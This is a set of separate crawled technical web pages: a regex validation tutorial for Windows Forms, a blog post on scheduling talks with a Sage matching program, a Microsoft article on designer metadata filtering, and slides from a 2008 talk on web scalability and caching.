To try out the code, create a new Windows Forms project, and place a text box and an error provider on Form1. Add a button to the form, just to give a second control to tab to. Create an event handler for the text box Validating event, and paste the above code in the event handler. Now, type an 'a' in the text box and tab out of it. An error 'glyph' should appear to the right of the text box, like this:

If you move the mouse over the glyph, a tool tip should appear with the error message. Much more elegant, and far less jarring, than a message box! But we can actually do better than that.
Add an event handler for the text box TextChanged event, and paste the code from the Validating event into it. Now, run the program, and type an 'a' in the text box. This time, the error glyph appears as soon as you type the invalid character, without waiting for you to leave the text box.

The TextChanged event provides us with a means for performing key-press validation. This type of validation provides the user with immediate feedback when an invalid character is typed. It can be paired with completion validation to provide a complete check of data entered by the user. We will use several examples of key-press-completion validation later in this article. I generally recommend using key-press validators to ensure that no invalid characters are entered into a field. Pair the key-press validator with a completion validator to verify that the contents of the control match any pattern that may be required. We will see several examples of this type of validation, using floating point numbers, dates, and telephone numbers, later in the article. Submission validation will still be required for some purposes, such as ensuring that required fields are not left blank. But as a rule, it should be relied on as little as possible.

Now that we have seen how to validate, let's look at the regular expressions that do the work. We begin with two special characters: '^' and '$'. These two symbols mark the beginning and end of a line, respectively. Enter this into the Regex box of Regex Tester:

^$

The Regex box turns green, indicating that the regex is valid. The Test box is also green, indicating that an empty string is allowed. Now type something, anything, in the Test box. It doesn't match the pattern, so the Test box turns red. Now let's allow some content. Change the regex to:

^[0-9]*$

The square brackets define a character class that matches any digit from 0 to 9, and the asterisk means "zero or more of the preceding item". So, "match any string that consists of a sequence of zero or more digits" is a fair reading of the regex. To verify, type in any number of digits in the Test box. It stays green. But type in any other character, and the box turns red. What we have just done is create a regex that can validate a text box as containing an integer.

Clear the boxes, and enter the same regex again. Now, replace the asterisk with a plus sign. Now the regex reads: "Match any string that consists of a sequence of one or more digits". Empty strings are now disallowed. When you change the asterisk to a plus sign, the empty Test box should turn red, since empties are no longer allowed. Otherwise, the box behaves just as it did before. The only difference between the asterisk and the plus sign is that the asterisk allows empties, and the plus sign doesn't. As we will see later, these symbols can be applied to an entire regex, or to part of a regex. We will see how, when we look at grouping.

The validators we worked with in the last section will validate integers, but not real numbers. Use either of the preceding regexes, and enter the number 123.45. The Test box turns red as soon as you type the decimal point, because a period is not among the characters the pattern allows. The period is a special character in regular expressions, so we add it to the pattern by escaping it with a backslash:

^[0-9]+\.$

Now enter '123.45' into the Test box. This time, the box should be red until you enter the decimal point. Then it turns green, until you enter the 4, when it turns red again. Clearly, we have some more work to do.

The Test box turned red until you hit the decimal point because it is a required character. No matter how many numbers you enter, they must be followed by a decimal point. That would work fine for a completion validator, but it won't work for a key-press validator. In that case, we want to allow the period, but not require it. The solution is to make the period optional. We do that by putting a question mark after the period, like this:

^[0-9]+\.?$

Try it in Regex Tester, entering 123.45 once again. The Test box will stay green until you type the '4', at which point it will turn red again. We have taken care of the decimal-point problem, but we still need to do something about the numbers that follow it. Our problem is that the decimal point is the last item specified in the pattern. That means, nothing can come after it.
But we want more numbers to come after it! Then we should add them to our pattern, like this:

^[0-9]+\.?[0-9]*$

Try that pattern in the Regex box, and type '123.45' in the Test box. The box should be red when it is empty, but green when an integer or a real number is typed into it. Note that for the decimal portion of the number, we used an asterisk, instead of a plus sign. That means the decimal portion can have zero elements; we have, in effect, made the decimal portion of the number optional, as well.

There is only one problem that remains. Let's assume we have a text box that we need to validate for a real number, and that an empty is not allowed for this text box. Our current validators will do the job for a completion validator, but not for a key-press validator. Why not? Try this: click after the number in the Test box, then backspace until you remove the last digit. When you do, the box turns red. That means, if the user starts entering a number, then deletes it by backspacing, a glyph is going to pop up. To the user, that's a bug. What it means for us is that we need slightly different regexes for the two validators. The completion regex should disallow empties, but the key-press regex needs to allow them. To do that, change the plus sign in the regex to an asterisk, so that the regex looks like this:

^[0-9]*\.?[0-9]*$

Now, the Test box is green, even when it is empty. Use this modified regex in the key-press validator. This approach gives us the best of both worlds; the user gets immediate feedback while entering the number, and empties are flagged as errors without getting in the user's way.

The preceding examples point out the need for validator pairs. In many cases, we need a key-press validator to ensure that no invalid characters are entered, and a separate completion validator to ensure that the field matches whatever pattern is required. By now, you should be getting the hang of simple validators. Regular expressions are as powerful as you want them to be; they constitute a language all their own. But as you have seen, you can get started with just a few elements. Here are some other handy elements of regular expression syntax:

Groups: Parentheses are used to group items. Here is a regex for a comma-delimited list of integers:

^([0-9]*,?)*$

Here is how to read it: "Match any string that consists of zero or more groups, each made up of zero or more digits followed by an optional comma." Type a comma-delimited list of integers into the Test box, and it stays green. But add a space after one of the commas, and the box turns red, because spaces are not allowed by the pattern. We can modify the pattern to allow spaces, by using a feature known as alternates. Alternates are specified by using the pipe (|) character within a group. Here is how the last regex looks when we allow a comma-space combination as an alternative to a simple comma:

^([0-9]*(,|, )?)*$

Note that there is a space after the second comma in the regex. The group with the commas now reads: "…followed by a comma, or a comma and a space…" Now, type in a comma-delimited list of integers with a space after each comma. The Test box stays green, so long as you enter only a single space after each comma. But suppose you want to let the user type an unlimited number of spaces after each comma? Here is an opportunity to test yourself. See if you can modify the last regex to allow unlimited spaces. Don't peek at the answer until you have given it a try.

The simple answer is to add an asterisk after the space in the alternate group:

^([0-9]*(,|, *)?)*$

That regex will work, but we can tweak it a bit to make it more elegant. The comma-space-asterisk alternate means: "Followed by a comma, followed by zero or more spaces." But that makes the first alternate redundant.
And that means, we can delete the first alternate entirely, which brings us to the final answer:

^([0-9]*(, *)?)*$

Again, note the space after the comma. This solution is both shorter and easier to understand than our original solution. Hopefully, this exercise gives you a feel for the process of developing a regular expression. They are not as difficult as they first appear.

Dates: Dates follow a well-known pattern, such as mm/dd/yyyy. Here is a key-press regex for a date in that format:

^([0-9]|/)*$

Copy that regex to Regex Tester and give it a try. Note that the validation fails if the user enters dashes, instead of slashes, between the parts of the date. How could we increase the flexibility of our regex to accommodate dashes? Think about the question for a minute before moving on.

All we need to do is add a dash to the alternates group:

^([0-9]|/|-)*$

We could add other alternates to make the regex as flexible as it needs to be. The completion validator does a final check to determine whether the input matches a complete date pattern:

^[0-2]?[1-9](/|-)[0-3]?[0-9](/|-)[1-2][0-9][0-9][0-9]$

The regex reads as follows: "Match any string that conforms to this pattern: The first character can be a 0, 1, or 2, and it may be omitted. The second character can be any digit from 1 to 9 and is required. The next character can be a slash or a dash, and is required. The day works the same way: an optional 0 through 3, followed by a required digit, followed by a required slash or dash. The year is four digits, the first of which must be a 1 or a 2." Note that character classes can hold ranges of letters as well as digits; for example, '[a-zA-Z]' allows upper or lower-case letters.

Our date regex also points out some of the limitations of regex validation. Paste the date regex shown into Regex Tester and try out some dates. The regex does a pretty good job with run-of-the-mill dates, but it allows some patently invalid ones, such as '29/29/2006', or '12/39/2006'. The regex is clearly not 'bulletproof'. We could beef up the regular expression with additional features to catch these invalid dates, but it may be simpler to use a bit of .NET in the completion validator:

DateTime dummy;
bool isValid = DateTime.TryParse(dateString, out dummy);

We gain the additional benefit that .NET will check the date for leap year validity, and so on. As always, the choice comes down to: What is simpler? What is faster? What is more easily understood? In my shop, we use a regex for the key-press validator, and DateTime.TryParse() for the completion validator.

Telephone numbers: Telephone numbers are similar to dates, in that they follow a fixed pattern. Telephone numbers in the US follow the pattern (nnn) nnn-nnnn, where n equals any digit. But creating a regex for a telephone number presents a new problem: How do we include parentheses in our pattern, when parentheses are special characters that specify the start and end of a group? Another way of stating the problem is: We want to use parentheses as literals, and not as special characters. To do that, we simply escape them by adding a backslash in front of them. Any special character (including the backslash itself) can be escaped in this manner. Backslash characters are also used for shortcuts in regular expressions. For example, '\d' matches any single digit; it is equivalent to the character class '[0-9]'.

A key-press validator built from these characters will ensure that invalid characters are not entered, but it will not perform a full pattern matching. For that, we need a separate completion validator:

^\(\d\d\d\) \d\d\d-\d\d\d\d$

This validator specifies the positions of the parentheses and the dash, and the position of each digit. In other words, it verifies not only that all characters are valid, but that they match the pattern of a U.S. telephone number. Neither one of these regular expressions is bulletproof, but they will give you a good starting point for developing your own regular expressions. If you come up with a good one, why not post it as a comment to this article?
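Putting the telephone-number discussion into working code, here is a minimal sketch of a key-press/completion validator pair in the style of the Validating handler shown earlier. The control name phoneTextBox and the key-press pattern are illustrative choices, not taken verbatim from the article:

// Key-press validator: allow only characters that can appear in (nnn) nnn-nnnn.
private void phoneTextBox_TextChanged(object sender, EventArgs e)
{
    Regex keyPress = new Regex(@"^(\d|\(|\)|-| )*$");
    errorProvider1.SetError(phoneTextBox,
        keyPress.IsMatch(phoneTextBox.Text)
            ? String.Empty
            : "Only digits, parentheses, dashes and spaces may be entered here");
}

// Completion validator: the full pattern must match when the control is left.
private void phoneTextBox_Validating(object sender, CancelEventArgs e)
{
    Regex completion = new Regex(@"^\(\d\d\d\) \d\d\d-\d\d\d\d$");
    errorProvider1.SetError(phoneTextBox,
        completion.IsMatch(phoneTextBox.Text)
            ? String.Empty
            : "Phone numbers must match the pattern (nnn) nnn-nnnn");
}

As with the number example, the key-press pattern deliberately allows an empty string, so backspacing over the field does not raise the error glyph.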
We have barely scratched the surface of regular expressions, but we have accomplished what we set out to do. At the beginning of this article, I promised that you would be able to write simple validators, and that you would know enough to dig further into the subject. At this point, you should be able to do both. There are thousands of regular expression resources on the Web. I would particularly recommend the following two web sites:

Also worthy of note is The 30 Minute Regex Tutorial, an article on CodeProject. It includes a nice regex utility called Expresso.

public ContactInfo()
{
    InitializeComponent();
    txtFirstName.Tag = new RegexValidator("^[A-Z][a-z]{0,19}$", "First name is required. (Title case formatted)");
    txtMiddleInitial.Tag = new RegexValidator("^[A-Z]?$", "Middle initial must be uppercase");
    txtLastName.Tag = new RegexValidator("^[A-Z][a-z]{0,19}$", "Last name is required. (Title case formatted)");
    txtAddress.Tag = new RegexValidator(@"(?=.*\w)", "Must enter at least one non-whitespace character");
    txtCity.Tag = new RegexValidator(@"(?=.*\w)", "Must enter at least one non-whitespace character");
    txtZip.Tag = new RegexValidator(@"^\d{5}(-\d{4})?$", "Must be of the form XXXXX or XXXXX-XXXX");
}

private void allTextBox_Validating(object sender, CancelEventArgs e)
{
    Control validControl = (Control)sender;
    RegexValidator regExVal = validControl.Tag as RegexValidator;
    if (regExVal != null)
    {
        if (!regExVal.Validate(validControl.Text))
        {
            e.Cancel = true;
            errorProvider1.SetError(validControl, regExVal.ErrorMessage);
        }
    }
}

public bool Validate(string validatedStr)
{
    string trimmedStr = validatedStr.Trim();
    // for debugging purposes
    bool result = Regex.IsMatch(trimmedStr, regExpPattern);
    string resultStr = string.Format("The result of IsMatch() is: {0}", result);
    MessageBox.Show(resultStr, "Debugging");
    return Regex.IsMatch(trimmedStr, regExpPattern);
}

private void textBox1_Validating(object sender, CancelEventArgs e)
{
    double parsedValue;
    bool success = double.TryParse(textBox1.Text, out parsedValue);
    if (success)
    {
        parsedValue = -(Math.Abs(parsedValue));
        textBox1.Text = parsedValue.ToString("N0");
        errorProvider1.SetError(textBox1, String.Empty);
    }
    else
    {
        errorProvider1.SetError(textBox1, "Not a number");
    }
}
https://www.codeproject.com/Articles/13255/Validation-with-Regular-Expressions-Made-Simple?msg=2785094
CC-MAIN-2017-43
en
refinedweb
I need to schedule 40ish talks and this needs to fit around the student availability as well as my own. In this post I'll describe how I did this using a combination of Doodle, +Sage Mathematical Software System and Graph Theory. The beginning of this post will be some of the boring details but towards the end I start talking about the mathematics (so feel free to skip to there...).

First of all I needed to know my students' availability. For this I simply used Doodle. I kind of use Doodle for every meeting I have to schedule (they also offer a cool tool that lets you show your availability so students/colleagues have an indication of when I might be able to meet with them). Here's a screenshot of the responses:

You can't really see anything there as I had to zoom out a lot to grab the whole picture. Doodle allows you to download the information for any given poll in .xls format, so I could relatively easily obtain the biadjacency matrix $M$ for my problem, where $M_{ij}$ is 1 if group $i$ is available for schedule slot $j$ and 0 otherwise.

The mathematics and code needed.

Once I've got a .csv file (by tweaking the .xls file) of the biadjacency matrix I import that into +Sage Mathematical Software System and convert it to an instance of the `Matrix` class using the following:

import csv
f = open(DATA + 'availabilitymatrix', 'r')
data = [[int(j) for j in row] for row in csv.reader(f)]
f.close()
M = Matrix(data)

I then need to remove any particular schedule slots that are not picked by any company:

M = matrix([row for row in M.transpose() if max(row) != 0]).transpose()

Once I've done this I can define the bipartite graph (bipartite simply means that the vertices can be separated into two non-adjacent collections):

g = BipartiteGraph(M)

We can then get a picture of this. I do this using a 'partition' (a graph colouring) that will colour the groups (red) and the schedule slots (blue):

p = g.coloring()
g.show(layout='circular', dist=1, vertex_size=250, graph_border=True, figsize=[15,15], partition=p)

The various options I pass to the `show` command are simply to get the circular arrangement (and other minor things):

The above looks quite messy, and what I essentially want is to get as many pairwise matchings between the blue vertices (slots) and red vertices (companies) as possible, so that each schedule slot is attributed at most 1 company and every company has at least 1 schedule slot. On any given graph $G=(V,E)$ this problem is known as looking for a maximum matching and can be written down mathematically:

Max: $\sum_{e \in E(G)} m_e$

Such that: $\forall v \in V(G)$: $\sum_{e \in E(G) \atop v \sim e} m_e \leq 1$

We are in essence finding a subset of edges of our original graph in such a way as to maximise the number of edges such that no vertex has more than 1 edge. This is all explained extremely well at the +Sage Mathematical Software System documentation pages here. Furthermore, at the documentation the code needed to solve the problem is also given:

p = MixedIntegerLinearProgram()
matching = p.new_variable(binary=True)
p.set_objective(sum(matching[e] for e in g.edges(labels=False)))
for v in g:
    p.add_constraint(sum(matching[e] for e in g.edges_incident(v, labels=False)) <= 1)
p.solve()

When I run the above, `p` is now a solved Mixed Integer Linear Program (corresponding to the matching problem described).
To obtain the solution:

matching = p.get_values(matching)
schedule = [e for e, b in matching.iteritems() if b == 1]

Calling `schedule` gives a set of edges (denoted by the corresponding vertex numbers):

[(5, 57), (0, 45), (23, 50), (4, 42), (38, 60), (26, 56), (34, 62), (16, 68), (1, 43), (7, 40), (9, 44), (36, 58), (12, 49), (35, 71), (28, 66), (25, 47), (24, 53), (6, 46), (3, 64), (39, 67), (17, 69), (22, 55), (13, 48), (33, 41), (10, 63), (21, 61), (30, 52), (29, 65), (37, 70), (15, 54), (19, 51), (11, 59)]

It is then really easy to draw another graph:

B = Graph(schedule)
p = B.coloring()
B.show(layout='circular', dist=1, vertex_size=250, graph_border=True, figsize=[15,15], partition=p)

You can see that the obtained graph has all the required properties and most importantly is a lot less congested.

Some details.

I'm leaving out some details. For example, I kept track of the names of the companies and also the slots so that the final output of all this looked like this:

4InARow: Fri1100
Abacus: Tue0930
Alpha1: Thu1130
Alpha2: Mon0930
AusfallLtd: Fri1230
AxiomEnterprise: Thu1000
Batduck: Thu1430
CharliesAngles: Thu1500
CwmniRhifau: Mon1330
EasyasPi: Fri1130
Evolve: Thu1300
HSPLLtd.: Mon1030
JECT: Tue1200
JJSL: Thu1030
JNTL: Mon1400
JennyCash: Tue1630
KADE: Fri1330
MIAS: Fri1300
MIPE: Thu1100
MLC: Tue1600
Nineties: Mon0900
Promis: Fri1400
R.A.C.H: Tue1530
RYLR: Tue1230
SBTP: Fri1030
Serendipity: Mon1230
UniMath: Tue1300
VectorEnterprises: Tue1330
Venus: Thu1400
codeX: Mon1300
dydx: Wed1630
eduMath: Thu0930

(BatDuck is my favourite company name by far...)

Why did I do this this way? There are 3 reasons:

1. I shared the schedule with my students through a published Sage sheet on our server. That way they can see a direct applied piece of mathematics and can also understand some of the code if they wanted to.

2. "Point and click doesn't scale" - I'm sure I could have solved this one instance of my problem with pen and paper and some common sense faster than it took me to write the code to solve the problem. The thing is, next year when I need to schedule these talks again it will at most take me 3 minutes as the code is all here and ready to go. (Most readers of this blog won't need that explained, but if any of my students find their way here: that's an important message for you.)

3. It was fun.
http://drvinceknight.blogspot.co.uk/2014_03_01_archive.html
CC-MAIN-2017-43
en
refinedweb
Metadata Filtering

Metadata filtering allows a designer to modify the set of properties, attributes and events exposed by a component or control at design time. For example, Control has a property named Visible that determines whether the control is visible. At design time, however, the control should always remain visible, regardless of the value of this property, so that a developer can position it on the design surface. The designer for Control replaces the Visible property with its own version at design time and later restores the run-time value of this property.

To perform metadata filtering, a designer can either implement the IDesignerFilter interface, or add an ITypeDescriptorFilterService implementation to the design-time services provider that can perform metadata filtering on any component in the design-time environment.

When a component is selected at design time, the property browser queries the component for its attributes, events, and properties through the methods of a TypeDescriptor. When a component is queried for its attributes, events, and properties in design mode, any designer for the component that implements the IDesignerFilter interface is given an opportunity to modify the set of attributes, events, and properties returned by the component. The methods of any active ITypeDescriptorFilterService are called next to allow the service to do any filtering of attributes, events and properties.

A component in design mode is typically queried for its attributes, events and properties when the Refresh method of TypeDescriptor is called on the component, when the Properties window is refreshed, when design mode is established or reestablished, and when the primary selection is set. Methods of other objects or a design-time environment may call the methods of a TypeDescriptor at other times.

The IDesignerFilter interface defines a set of methods that can be overridden and implemented in a designer to alter the properties, events, or attributes exposed by the component managed by the designer at design time. Each method of the IDesignerFilter interface is prefixed with either "Pre" or "Post", and suffixed with either "Attributes", "Events", or "Properties", depending on which type of member it allows you to add, change, or remove. To add any attributes, events, or properties, use the relevant method whose name begins with "Pre". To change or remove any attributes, events, or properties, use the relevant method whose name begins with "Post". The methods whose names begin with "Pre" are called immediately before the methods whose names begin with "Post".

The following code example block shows the method signatures of the IDesignerFilter interface.

public interface IDesignerFilter
{
    void PostFilterAttributes(IDictionary attributes);
    void PostFilterEvents(IDictionary events);
    void PostFilterProperties(IDictionary properties);
    void PreFilterAttributes(IDictionary attributes);
    void PreFilterEvents(IDictionary events);
    void PreFilterProperties(IDictionary properties);
}

The following code example demonstrates an implementation of IDesignerFilter that adds a Color property of the designer to the associated component. You need to add a reference to System.Design.dll.
using System;
using System.ComponentModel;
using System.ComponentModel.Design;
using System.Drawing;
using System.Windows.Forms;
using System.Windows.Forms.Design;

namespace IDesignerFilterSample
{
    public class DesignerFilterDesigner : ComponentDesigner, IDesignerFilter
    {
        // Designer color property to add to the component.
        public Color TestColor
        {
            get { return this.intcolor; }
            set { this.intcolor = value; }
        }

        // Color for the TestColor property.
        private Color intcolor = Color.Azure;

        public DesignerFilterDesigner() {}

        // Adds a color property of this designer to the component.
        protected override void PreFilterProperties(System.Collections.IDictionary properties)
        {
            base.PreFilterProperties(properties);
            // Adds a test property to the component.
            properties.Add("TestColor",
                TypeDescriptor.CreateProperty(typeof(DesignerFilterDesigner),
                    "TestColor", typeof(System.Drawing.Color), null));
        }
    }

    // Component with which the DesignerFilterDesigner is associated.
    [Designer(typeof(DesignerFilterDesigner))]
    public class TestComponent : Component
    {
        public TestComponent() {}
    }
}

For an example of a Windows Forms control designer that implements property filtering using the IDesignerFilter interface, see the Windows Forms Designer Sample.

You can provide metadata filtering for any component in a design-time project by adding an ITypeDescriptorFilterService implementation to the service provider that provides services at design time, using the AddService method of the IServiceContainer interface implemented by the ISite returned by the Site property of a Component sited in design mode. The following code example demonstrates how to add an ITypeDescriptorFilterService service called ExampleFilterService.

IDesignerHost dh = (IDesignerHost)this.Component.GetService(typeof(IDesignerHost));
if (dh != null)
{
    // First gets any previous ITypeDescriptorFilterService, to restore when
    // the current service is removed, and to call if the new service
    // implements service chaining.
    ITypeDescriptorFilterService oldService = (ITypeDescriptorFilterService)
        dh.GetService(typeof(ITypeDescriptorFilterService));

    // Removes any old ITypeDescriptorFilterService.
    if (oldService != null)
        dh.RemoveService(typeof(ITypeDescriptorFilterService));

    // Adds an ExampleFilterService that implements service chaining.
    dh.AddService(typeof(ITypeDescriptorFilterService),
        new ExampleFilterService(oldService));
}

For an example ITypeDescriptorFilterService implementation, see the reference documentation for the ITypeDescriptorFilterService class.
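The ExampleFilterService itself is not shown in this article. As a rough sketch (my own illustration, not the documentation's sample), a chaining implementation could look like the following; the Boolean results indicate whether the filtered metadata may be cached:

using System.Collections;
using System.ComponentModel;
using System.ComponentModel.Design;

namespace IDesignerFilterSample
{
    // Sketch of a chaining ITypeDescriptorFilterService. It forwards to any
    // previously installed service first, so existing filtering keeps working.
    public class ExampleFilterService : ITypeDescriptorFilterService
    {
        private readonly ITypeDescriptorFilterService oldService;

        public ExampleFilterService(ITypeDescriptorFilterService oldService)
        {
            this.oldService = oldService; // may be null if none was installed
        }

        public bool FilterAttributes(IComponent component, IDictionary attributes)
        {
            return oldService == null || oldService.FilterAttributes(component, attributes);
        }

        public bool FilterEvents(IComponent component, IDictionary events)
        {
            return oldService == null || oldService.FilterEvents(component, events);
        }

        public bool FilterProperties(IComponent component, IDictionary properties)
        {
            // Example change: remove the "TestColor" property added by the
            // designer above (a no-op if it is not present).
            properties.Remove("TestColor");
            return oldService == null || oldService.FilterProperties(component, properties);
        }
    }
}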
https://msdn.microsoft.com/en-us/library/tbt775x3.aspx
CC-MAIN-2017-43
en
refinedweb
com/group/scalable

Real World Web: Performance & Scalability
Ask Bjørn Hansen, Develooper LLC – April 14, 2008 – r17

Hello.
• I'm Ask Bjørn Hansen: perl.org, ~10 years of mod_perl app development, mysql and scalability consulting, YellowBot
• I hate tutorials!
• Let's do 3 hours of 5 minute° lightning talks!
° Actual number of minutes may vary

Construction Ahead!
• Conflicting advice ahead
• Not everything here is applicable to everything
• Ways to "think scalable" rather than be-all-end-all solutions
• Don't prematurely optimize! (just don't be too stupid with the "we'll fix it later" stuff)

Questions ... How many ...
• ... are using PHP? Python? Java? Ruby? C?
• 3.23? 4.0? 4.1? 5.0? 5.1? 6.x?
• MyISAM? InnoDB? Other?
• Are primarily "programmers" vs "DBAs"?
• Replication? Cluster? Partitioning?
• Enterprise? Community?
• PostgreSQL? Oracle? SQL Server? Other?

Seen this talk before?
• No, you haven't. :-)
• ~266 people * 3 hours = half a work year!
(chart: slide count per talk, 2001-2008)

Question Policy!
• Do we have time for questions? Yes! (probably)
• Quick questions anytime
• Long questions after, or on the list!
(chart: slides per minute, 2001-2008)
(the answer to anything is likely "it depends" or "let's talk about it after / send me an email")

The first, last and only lesson:
• Think Horizontal!
• Everything in your architecture, not just the front end web servers
• Micro optimizations and other implementation details – Bzzzzt! Boring! (blah blah blah, we'll get to the cool stuff in a moment!)

Benchmarking techniques
• Scalability isn't the same as processing time
• Not "how fast" but "how many"
• Test "force", not speed. Think amps, not voltage
• Test scalability, not just "performance"
• Test with "slow clients"
• Use a realistic load
• Testing "how fast" is ok when optimizing implementation details (code snippets, sql queries, server settings)

Vertical scaling
• "Get a bigger server"
• "Use faster CPUs"
• Can only help so much (with bad scale/$ value)
• A server twice as fast is more than twice as expensive
• Super computers are horizontally scaled!

Horizontal scaling
• "Just add another box" (or another thousand or ...)
• Good to great ...
• Implementation: scale your system a few times
• Architecture: scale dozens or hundreds of times
• Get the big picture right first, do micro optimizations later

Scalable Application Servers
Don't paint yourself into a corner from the start

Run Many of Them
• Avoid having The Server for anything
• Everything should (be able to) run on any number of boxes
• Don't replace a server, add a server
• Support boxes with different capacities

Stateless vs Stateful
• "Shared Nothing"
• Don't keep state within the application server (or at least be Really Careful)
• Do you use PHP, mod_perl, mod_...? Anything that's more than one process? You get that for free! (usually)

Sessions
"The key to be stateless" or "What goes where"

No Local Storage
• Ever! Not even as a quick hack.
• Storing session (or other state information) "on the server" doesn't work.
• "But my load balancer can do 'sticky sessions'"
• Uneven scaling – waste of resources (and unreliable, too!)
• The web isn't "session based", it's one short request after another – deal with it

Evil Session
Cookie: session_id=12345
Web/application server with local session store
What's wrong with this? ...
12345 => {
    user => {
        username => 'joe',
        email => '[email protected]',
        id => 987,
    },
    shopping_cart => { ... },
    last_viewed_items => { ... },
    background_color => 'blue',
},
12346 => { ... },
....

What's wrong with this?
• Easy to guess cookie id
• Saving state on one server!
• Duplicate data from a DB table
• Big blob of junk!

Good Session!
Cookie: sid=seh568fzkj5k09z; user=987-65abc; bg_color=blue; cart=...;
• Stateless web server!
• Important data in database(s)
• Individual expiration on session objects
• Small data items in cookies

Database(s):
Users:
987 => { username => 'joe', email => '[email protected]' },
...
Shopping Carts:
...

memcached cache:
seh568fzkj5k09z => { last_viewed_items => {...}, ... other "junk" ... },
....

Safe cookies
• Worried about manipulated cookies?
• Use checksums and timestamps to validate
• cookie=1/value/1123157440/ABCD1234
• cookie=$cookie_format_version/$value/$timestamp/$checksum
• function cookie_checksum { md5_hex( $secret + $time + $value ); }

Safe cookies
• Want fewer cookies? Combine them:
• cookie=1/user::987/cart::943/ts::1123.../EFGH9876
• cookie=$cookie_format_version/$key::$value[/$key::$value]/ts::$timestamp/$md5
• Encrypt cookies if you must (rarely worth the trouble and CPU cycles)

I did everything – it's still slow!
• Optimizations and good micro-practices are necessary, of course
• But don't confuse what is what!
• Know when you are optimizing
• Know when you need to step back and rethink "the big picture"

Caching
How to not do all that work again and again and again...

Cache hit-ratios
• Start with things you hit all the time
• Look at web server and database logs
• Don't cache if you'll need more effort writing to the cache than you save
• Do cache if it'll help you when that one single page gets a million hits in a few hours (one out of two hundred thousand pages on the digg frontpage)
• Measure! Don't assume – check!

Generate Static Pages
• Ultimate Performance: Make all pages static
• Generate them from templates nightly or when updated
• Doesn't work well if you have millions of pages or page variations
• Temporarily make a page static if the servers are crumbling from one particular page being busy
• Generate your front page as a static file every N minutes

Cache full pages (or responses if it's an API)
• Cache full output in the application
• Include cookies etc. in the "cache key"
• Fine tuned application level control
• The most flexible: "use cache when this, not when that" (anonymous users get cached page, registered users get a generated page)
• Use regular expressions to insert customized content into the cached page

Cache full pages 2
• Front end cache (Squid, Varnish, mod_cache) stores generated content
• Set Expires/Cache-Control header to control cache times
• or Rewrite rule to generate page if the cached file doesn't exist (this is what Rails does or did...) – only scales to one server

RewriteCond %{REQUEST_FILENAME} !-s
RewriteCond %{REQUEST_FILENAME}/index.html !-s
RewriteRule (^/.*) /dynamic_handler/$1 [PT]

• Still doesn't work for dynamic content per user ("6 items in your cart")
• Works for caching "dynamic" images ...
on one server

Cache partial pages
• Pre-generate static page "snippets" (this is what my.yahoo.com does or used to do...)
• Have the handler just assemble pieces ready to go
• Cache little page snippets (say the sidebar)
• Be careful, easy to spend more time managing the cache snippets than you save!
• "Regexp" dynamic content into an otherwise cached page

Cache data
• Cache data that's slow to query, fetch or calculate
• Generate page from the cached data
• Use the same data to generate API responses!
• Moves load to cache servers (for better or worse)
• Good for slow data used across many pages ("today's bestsellers in $category")

Caching Tools
Where to put the cache data ...

A couple of bad ideas – Don't do this!
• Process memory ($cache{foo}) – not shared!
• Shared memory? Limited to one machine (likewise for a file system cache)
• Local file system?
• MySQL query cache – some implementations are really fast, but it's flushed on each update; nice if it helps, don't depend on it

MySQL cache table
• Write into one or more cache tables
• id is the "cache key"
• type is the "namespace"
• metadata for things like headers for cached http responses
• purge_key to make it easier to delete data from the cache

CREATE TABLE `combust_cache` (
  `id` varchar(64) NOT NULL,
  `type` varchar(20) NOT NULL default '',
  `created` timestamp NOT NULL default CURRENT_TIMESTAMP on update CURRENT_TIMESTAMP,
  `purge_key` varchar(16)

MySQL Cache Fails
• Scaling and availability issues
• How do you load balance?
• How do you deal with a cache box going away?
• Partition the cache to spread the write load
• Use Spread to write to the cache and distribute configuration
• General theme: Don't write directly to the DB

MySQL Cache Scales
• Persistence
• Most of the usual "scale the database" tricks apply
• Partitioning
• Master-Master replication for availability
• .... more on those things in a moment
• Put metadata in memcached for partitioning and failover information

memcached
• LiveJournal's distributed caching system (used practically everywhere!)
• Memory based – memory is cheap!
• Linux 2.6 (epoll) or FreeBSD (kqueue) – low overhead for many many connections
• Run it on boxes with free memory ... or a dedicated cluster: Facebook has more than five hundred dedicated memcached servers (a lot of memory!)

more memcached
• No "master" – fully distributed
• Simple lightweight protocol (binary protocol coming)
• Scaling and high-availability is "built-in"
• Servers are dumb – clients calculate which server to use based on the cache key
• Clients in perl, java, php, python, ruby, ...
• New C client library, libmemcached

How to use memcached
• It's a cache, not a database
• Store data safely somewhere else
• Pass-through cache (id = session_id or whatever):

Read:
$data = memcached_fetch( $id );
return $data if $data;
$data = db_fetch( $id );
memcached_store( $id, $data );
return $data;

Write:
db_store( $id, $data );
memcached_store( $id, $data );

Client Side Replication
• memcached is a cache - the data might "get lost"
• What if a cache miss is Really Expensive?
• Store all writes to several memcached servers
• Client libraries are starting to support this natively

Store complex data
• Most (all?) client libraries support complex data structures
• A bit flag in memcached marks the data as "serialized" (another bit for "gzip")
• All this happens on the client side – memcached just stores a bunch of bytes
• Future: Store data in JSON? Interoperability between languages!
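A concrete version of the pass-through pseudocode above, using the Perl Cache::Memcached client (a minimal sketch of my own, not from the slides; db_fetch and the server addresses are assumptions):

use Cache::Memcached;

my $memd = Cache::Memcached->new({
    servers => [ '10.0.0.15:11211', '10.0.0.16:11211' ],  # assumed addresses
});

sub fetch_with_cache {
    my ($id) = @_;
    my $data = $memd->get($id);
    return $data if $data;           # cache hit
    $data = db_fetch($id);           # your real data source (assumed helper)
    $memd->set($id, $data, 3600);    # store for an hour
    return $data;
}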
Store complex data 2
• Primary key lookups are probably not worth caching
• Store things that are expensive to figure out!

function get_slow_summary_data($id) {
    $data = memcached_fetch( $id );
    return $data if $data;
    $data = do_complicated_query( $id );
    memcached_store( $id, $data );
    return $data;
}

Cache invalidation
• Writing to the cache on updates is hard!
• Caching is a trade-off: you trade "fresh" for "fast"
• Decide how "fresh" is required and deal with it!
• Explicit deletes if you can figure out what to delete
• Add a "generation" / timestamp / whatever to the cache key:

select id, unix_timestamp(modified_on) as ts from users where username = 'ask';
memcached_fetch( "user_friend_updates; $id; $ts" )

Caching is a trade-off
• Can't live with it? Make the primary data-source faster or make the data-store scale!

Database scaling
How to avoid buying that gazillion dollar Sun box
• Vertical: ~$4,000,000
• Horizontal: ~$3,200 per box (= 1230 of them for $4.0M!)

Be Simple
• Use MySQL!
• It's fast and it's easy to manage and tune
• Easy to setup development environments
• Other DBs can be faster at certain complex queries but are harder to tune – and MySQL is catching up!
• Avoid making your schema too complicated
• Ignore some of the upcoming advice until you REALLY need it! (even the part about not scaling your DB "up")
• PostgreSQL is fast too :-)

Replication
